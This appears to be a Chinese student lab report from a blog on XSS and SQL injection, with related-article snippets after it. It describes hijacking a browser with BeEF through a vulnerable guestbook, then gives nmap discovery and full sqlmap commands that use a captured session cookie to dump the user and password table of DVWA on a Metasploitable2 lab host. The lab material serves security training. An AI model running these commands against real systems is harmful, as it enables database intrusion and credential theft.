实验三 XSS和SQL注入

最新推荐文章于 2024-04-16 12:05:24 发布
最新推荐文章于 2024-04-16 12:05:24 发布
阅读量319 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45538874/article/details/110943183
版权

目录

实验目的

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境

Kali Linux 2、Windows Server

网络环境

交换网络结构

实验工具

Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

XSS部分:利用Beef劫持被攻击者客户端浏览器

实验环境搭建
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站)
被攻击者:访问留言簿网站,浏览器被劫持。
在这里插入图片描述

注意!一定要把搭建的网站的权限打开,否则将无法留言

在这里插入图片描述

1、利用AWVS扫描留言簿网站,发现其存在XSS漏洞

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、 Kali使用beef生成恶意代码

在这里插入图片描述

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板

在这里插入图片描述

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图

在这里插入图片描述
将网页重定向为学校主页
在这里插入图片描述
在这里插入图片描述

SQL注入部分:DVWA+SQLmap+Mysql注入实战

首先扫描处于同一网段的Metasploitable2的IP
在这里插入图片描述
得到本机ip

nmap -sP 你所处网段/24
得到处于同一网段所有主机的ip

在这里插入图片描述
得到Metasploitable2的ip
输入http://Metasploitable的IP/dvwa得到以下画面
在这里插入图片描述

默认账号:admin
密码:password

输入账号登录
在这里插入图片描述
将SQL Injection中的high级别调为low级别,进行SQL注入的尝试
在这里插入图片描述

开启Firefox浏览器TamperData插件,等待获取cookies值,在SQL Injection输入1,即可获取cookie
在这里插入图片描述

在这里插入图片描述

此时得到注入点:http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
TamperData弹窗获取cookies值:security=low;PHPSESSID=438c6341d84f86576782371e85b0bc03

1、枚举登录MYSQL数据的用户名与密码

sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03”-b --current-db --current-user

在这里插入图片描述

2、枚举所有数据库

sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03”–string=“Surname” --users --password

在这里插入图片描述
在这里插入图片描述

3、枚举数据库和指定数据库的数据表

sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” --dbs

在这里插入图片描述
sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa --tables

在这里插入图片描述

4、获取指定数据库和表中所有列的信息

sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa -T users --columns

在这里插入图片描述

5、枚举指定数据表中的所有用户名与密码

sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa -T users -C user,password --dump

在这里插入图片描述

怀念、、 曾经旳 _______
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验三 XSSSQL注入
weixin_51458001的博客
11-24 566
一、什么是XSS? 1、XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 2、恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 3、XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。 4、另一
IIS环境检测到网站存在响应头X-XSS-Protection\X-Frame-Options\X-Content-Type-Options漏洞解决办法
Zola的博客
06-01 1682
4、检测到目标X-Permitted-Cross-Domain-Policies响应头缺失 重新配置IIS。5、检测到目标Strict-Transport-Security响应头缺失 重新配置IIS。3、检测到目标Content-Security-Policy响应头缺失 IIS设置。1、检测到目标X-Content-Type-Options响应头缺失。6、点击劫持:X-Frame-Options未配置 重新配置IIS。2、检测到目标X-XSS-Protection响应头缺失。
iis 7.5 php 防止跨站,iis安全---防范XSS跨站式脚本攻击
weixin_35682132的博客
03-19 410
iis安全---防范XSS跨站式脚本攻击网站要怎么防范常见的XSS跨站式脚本攻击呢,我们先从XSS跨站式脚本攻击的原理来说起。网站遭受XSS跨站式脚本攻击的基本原理1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。其攻击过程如下所示:A给B发送一个恶意构造了Web的URL。B点击并查看了这个URL。恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。具有漏洞的H...
文件上传漏洞、XSS漏洞、RCE漏洞
Fly_Mojito的博客
05-27 1117
文件上传漏洞、XXS漏洞、RCE漏洞
网络渗透实验(三)————xsssql注入(1)
weixin_75072512的博客
12-25 1225
只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。(刚刚开始遇到了报错,未经授权,解决方案:给IIS匿名用户访问网站文件夹的权限,方法:进入该文件夹的安全选项,添加IIS匿名用户,赋予权限(我给了everyone))查看down到本地的用户名与密码(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。////////////发现几次错误都在命令输入错误导致,报错先看命令。
【已解决】IIS环境检测到网站存在响应头缺失、禁用Options方法、解决跨域攻击等不安全
wangjunlei的专栏
04-16 1571
4、检测到目标X-Permitted-Cross-Domain-Policies响应头缺失 重新配置IIS。5、检测到目标Strict-Transport-Security响应头缺失 重新配置IIS。3、检测到目标Content-Security-Policy响应头缺失 IIS设置。1、检测到目标X-Content-Type-Options响应头缺失。6、点击劫持:X-Frame-Options未配置 重新配置IIS。2、检测到目标X-XSS-Protection响应头缺失。
网络渗透测试 XSSSQL注入
12-02
【网络渗透测试 XSSSQL注入】的实验旨在深入理解网络安全中的两种常见攻击手法,并学习如何防范。XSS(跨站脚本攻击)和SQL注入都是针对Web应用的安全威胁,主要利用了程序处理用户输入的疏忽。 XSS攻击是攻击者...
软件安全实验2 SQL注入实验
最新发布
06-19
分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、SQL Injection(SQL注入)...
适用于asp.net以及IIS服务器测试的网站源码(含有xss以及sql注入漏洞)
05-25
【标题】"适用于asp.net以及IIS服务器测试的网站源码(含有xss以及sql注入漏洞)" 提供了一个用于网络安全实践和IIS服务器配置验证的环境。这个资源包含了一个带有XSS(跨站脚本攻击)和SQL注入漏洞的ASP.NET网站源...
IIS中常见的十八个安全漏洞
07-09
IIS中常见的十八个安全漏洞
iis 漏洞扫描和利用工具
03-06
iis 漏洞扫描和利用工具,相当好用。多种漏洞利用方式可以选择,可以试试看哦!
IIS攻击与日志
10-22
IIS攻击与日志IIS攻击与日志IIS攻击与日志IIS攻击与日志IIS攻击与日志
PHP开发漏洞环境(SQL注入+文件上传+文件下载+XSS+万能密码+session/cookie+购物逻辑漏洞的学习等等)
05-08
这个PHP开发漏洞环境提供了学习和实践多种常见安全问题的机会,如SQL注入、文件上传、文件下载、跨站脚本(XSS)、弱口令、Session/Cookie管理以及购物逻辑漏洞等。下面将对这些知识点进行详细的阐述。 1. SQL注入:...
面向SQL注入XSS攻击的Web入侵检测系统的设计 论文.docx
06-19
### 面向SQL注入XSS攻击的Web入侵检测系统设计 #### 摘要解读与背景 随着互联网技术的飞速发展及其在日常生活中的广泛应用,网络安全问题日益凸显,尤其是针对Web应用的安全威胁,已经成为了学术界和产业界的...
.Net IIS 常用安全漏洞设置
oceanzh的博客
05-30 3335
安全选项 配置点 屏蔽 OPTIONS, TRACE Http响应   <system.webServer> <security>       <requestFiltering>         <verbsallowUnlisted="true">           <addverb="OPTIONS"allowed=&q
token的应用场景
Rad的博客
07-20 7152
1.基于Token的身份验证 之前Web就是文档的浏览,不需要记录谁浏览了什么文档,随着交互式Web应用的兴起,像电子商城等网站,就需要知道那些人登录了系统。由于http是无状态的会话,所以我们需要一个东西来记录。 我们目前使用的是三种: (1)session:在服务器端记录,每一个会话会产生一个session id。session的中文翻译是“会话”,当用户打开某个...
SQL注入攻击之SQLMap渗透测试
CTO成长之路——Rosanu
07-30 3600
准备工具:SQLMap、FireFox插件Tamper Data SQLMap进行渗透测试 FireFox插件Tamper Data用于获取Post参数数据和Cookie值 示例: SQLMap POST方法:sqlmap.py -u "http://www.url.com" --data "param1=1&param2=2"  --cookie="PHPSESSID=57p5g7f32
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值